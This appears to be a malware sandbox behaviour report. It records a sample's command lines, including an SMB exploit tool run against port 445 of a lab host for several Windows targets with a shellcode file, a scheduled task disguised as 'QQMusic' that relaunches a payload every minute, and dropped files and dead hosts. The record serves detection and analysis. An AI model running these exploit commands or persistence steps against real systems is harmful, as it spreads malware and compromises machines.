cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
file | C:\ProgramData\svchostromance.exe |
file | C:\ProgramData\svchostlong.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "spreadEmnopq.exe") |
section | {u'size_of_data': u'0x0053aa00', u'virtual_address': u'0x00397000', u'entropy': 7.933859471955468, u'name': u'.rsrc', u'virtual_size': u'0x0053a990'} | entropy | 7.93385947196 | description | A section with a high entropy has been found |
entropy | 0.58321533602 | description | Overall entropy of this PE file is high |
cmdline | taskkill /f /im spreadEmnopq.exe |
cmdline | ipconfig /flushdns |
cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
dead_host | 192.168.56.101:49373 |
dead_host | 192.168.56.101:49629 |
dead_host | 192.168.56.103:1433 |
dead_host | 192.168.56.103:19490 |
dead_host | 192.168.56.1:19490 |
dead_host | 192.168.56.1:21 |
dead_host | 192.168.56.101:50767 |
dead_host | 192.168.56.1:135 |
dead_host | 192.168.56.101:50801 |
dead_host | 192.168.56.101:49184 |
dead_host | 192.168.56.101:49291 |
dead_host | 192.168.56.101:50222 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.101:50778 |
dead_host | 192.168.56.101:49928 |
dead_host | 192.168.56.101:50587 |
dead_host | 192.168.56.101:50640 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.103:21 |
dead_host | 192.168.56.101:50004 |